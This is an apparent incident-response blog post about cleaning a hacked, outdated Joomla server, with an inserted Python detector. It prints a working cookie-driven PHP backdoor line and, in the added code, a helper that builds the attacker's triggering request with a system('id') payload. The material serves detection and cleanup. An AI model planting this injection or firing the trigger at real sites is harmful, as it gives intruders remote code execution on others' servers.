‘The Webpage is done sir, thank you for doing business with us.’

Got hacked..

Some time ago I was contacted by a friend. He had a problem: one of his customers' web servers had been compromised, and there was an issue with the outgoing e-mails.

The ISP had stopped all outgoing e-mail from the domain. With the amount of spam being sent out, the ISP itself could have ended up blacklisted.

This was not good for the customer. They depended on e-mail and stood to suffer financial loss.

They were running the Joomla CMS, and the website had not been updated in about two years. I said this was something they would need to fix: someone had to take a look and clean up the mess. I got the go-ahead.

Finding clues..

The root web directory contained over 65,000 files.

We had an outdated Joomla core, several outdated Joomla plugins, outdated dependencies for those plugins and customized pages, all on a deprecated version of PHP running on an old server.

Finding all the malicious code was not easy. First: which script was responsible for the large bursts of outgoing e-mail?

The ISP stated that it was the malicious scripts ‘list37.php’ and ‘utf58.php’. These files were deleted.

Secondly, we ran some manual searches across the files and turned up some nasty-looking code. The most effective searches were for ‘base64_decode()’ and ‘eval()’.

We found a PHP RCE script dated March 2014, so the web server had been owned for over two years.

–Example: a running copy of the website with a Perl backdoor installed through the RCE script.

The Joomla log folder recorded 75,000 failed login attempts. Moving on.

There were probably also passwords stored in plain text inside the web directory, and the database credentials were definitely compromised. No logs survived from before the compromise was discovered, so pinning down exactly where the intruders got in was hard. Most likely it was the outdated Joomla.

Obfuscated…

After all the manual searches, the program ‘php-malware-finder’ (https://github.com/nbs-system) was very helpful.

Running it turned up about 20 malware scripts: mass-mailers, small RCE scripts and a file uploader, spread across various sub-folders.

The filenames were ordinary-looking, like ‘configure.php’, ‘images.php’, ‘cache_db.php’, ‘license.php’, ‘list5.php’, ‘widget-links-info.php’, ‘test.php’ and ‘blog.php’.

The biggest we found was the ‘WSO’ backdoor, a full-featured PHP web shell.

–WSO backdoor. Some work.

There was also an injected line of code found in various legitimate files:

if(@$_COOKIE['drqmnf']){$cfkwl=$_COOKIE['drqmnf']("",@$_COOKIE['suirwk'](@$_COOKIE['yguyyv']));$cfkwl();}

All three cookies are supplied by the attacker. PHP treats a string variable followed by parentheses as a function call, so the first cookie names the function to call; since it is called with an empty string and one further argument, the intended value is create_function, which compiles its second argument as the body of a new function. The second cookie names a decoder, typically base64_decode, and the third carries the encoded PHP, which is compiled and then run by $cfkwl(). A normal visitor sends none of these cookies, so for everyone else the line does nothing, and a file search for eval() or base64_decode() never matches it.
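As an added example (not code from the original post), the following Python shows both how to catch this injection in a file and how to work out what it ran. The cookie names, the sample Joomla file and the attacker's request are constructed here; real infections use different random names, which is why the detector matches the shape of the call rather than the strings. One check a practitioner will want after finding such a line is to search the web server's access logs, if the log format records cookies, for requests carrying all three cookie names: that yields the attacker's addresses and the dates the backdoor was used.

```python
"""Detect the cookie-driven backdoor line and reconstruct what it runs.

Added example, not code from the original post. The injected line contains
no eval() and no base64_decode(): the function names arrive in the attacker's
cookies at request time, so a keyword search never sees them. Two checks
follow. find_cookie_dispatch() recognises the shape of the injection in PHP
source whatever cookie names the infection uses, and reconstruct_call() takes
a captured Cookie header and reports the function and decoded payload the
backdoor would have executed. The sample file, the cookie names and the
request are constructed for this example.
"""
import base64
import codecs
import re

# One cookie value used as a function name, called as fn("", decoder(payload))
# where decoder and payload are two more cookie values. The leading @ only
# silences the PHP notice when the cookie is absent.
_COOKIE_REF = r"""@?\$_COOKIE\[\s*['"](?P<{name}>\w+)['"]\s*\]"""
COOKIE_DISPATCH = re.compile(
    _COOKIE_REF.format(name="fn")
    + r"""\s*\(\s*['"]{2}\s*,\s*"""
    + _COOKIE_REF.format(name="decoder")
    + r"\s*\(\s*"
    + _COOKIE_REF.format(name="payload")
)

# Decoders an attacker can name in the middle cookie (assumed list).
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s).decode("utf-8", "replace"),
    "str_rot13": lambda s: codecs.decode(s, "rot13"),
}

# Constructed sample: a legitimate-looking Joomla file with the line appended.
INFECTED_SOURCE = """<?php
defined('_JEXEC') or die;
$app = JFactory::getApplication();
if(@$_COOKIE['drqmnf']){$cfkwl=$_COOKIE['drqmnf']("",@$_COOKIE['suirwk'](@$_COOKIE['yguyyv']));$cfkwl();}
"""


def find_cookie_dispatch(php_source: str):
    """Return [(line_no, fn_cookie, decoder_cookie, payload_cookie)] for each hit."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in COOKIE_DISPATCH.finditer(line):
            hits.append((lineno, m.group("fn"), m.group("decoder"), m.group("payload")))
    return hits


def parse_cookie_header(header: str) -> dict:
    """Minimal Cookie header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name.strip()] = value.strip()
    return jar


def reconstruct_call(cookie_header: str, fn_cookie: str, decoder_cookie: str, payload_cookie: str):
    """Return (function_name, decoded_payload) the backdoor would run for this request.

    Returns None when any of the three cookies is missing, which is the case
    for every ordinary visitor: the injected line is a no-op for them.
    """
    jar = parse_cookie_header(cookie_header)
    if not all(name in jar for name in (fn_cookie, decoder_cookie, payload_cookie)):
        return None
    decoder = jar[decoder_cookie]
    decode = DECODERS.get(decoder)
    try:
        body = decode(jar[payload_cookie]) if decode else f"<{decoder}({jar[payload_cookie]!r})>"
    except ValueError:
        body = f"<undecodable {decoder} input>"
    return jar[fn_cookie], body


def attacker_cookie_header(fn_cookie: str, decoder_cookie: str, payload_cookie: str, php_code: str) -> str:
    """Build the Cookie header that triggers the backdoor (constructed attacker request)."""
    encoded = base64.b64encode(php_code.encode()).decode()
    return f"{fn_cookie}=create_function; {decoder_cookie}=base64_decode; {payload_cookie}={encoded}"


if __name__ == "__main__":
    for lineno, fn, dec, pay in find_cookie_dispatch(INFECTED_SOURCE):
        print(f"line {lineno}: function from cookie {fn!r}, decoder {dec!r}, payload {pay!r}")
        request = attacker_cookie_header(fn, dec, pay, 'system("id");')
        print("attacker request: Cookie:", request)
        print("would execute:", reconstruct_call(request, fn, dec, pay))
```

Run stand-alone it prints the hit on line 4 of the constructed file and shows that a request carrying the three cookies makes the site call create_function with the body system("id");. The same reconstruct_call() can be pointed at cookie values pulled from a proxy capture or a log to see what the intruders actually ran.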


Any PHP file could be compromised, and an injection that is not obfuscated is harder to find than one that is: there is no eval() or base64_decode() standing out to search for.

–A typical base64-encoded string; the string contains the malicious PHP code.


The financial side..

System administration is a continuous process of monitoring, deploying updates, reading change-logs and security bulletins, troubleshooting, modifying and fixing errors. The cost of a compromised system is far higher than the cost of hiring someone to look after it on a permanent basis.

Do not say ‘The Webpage is done sir, thank you for doing business with us.’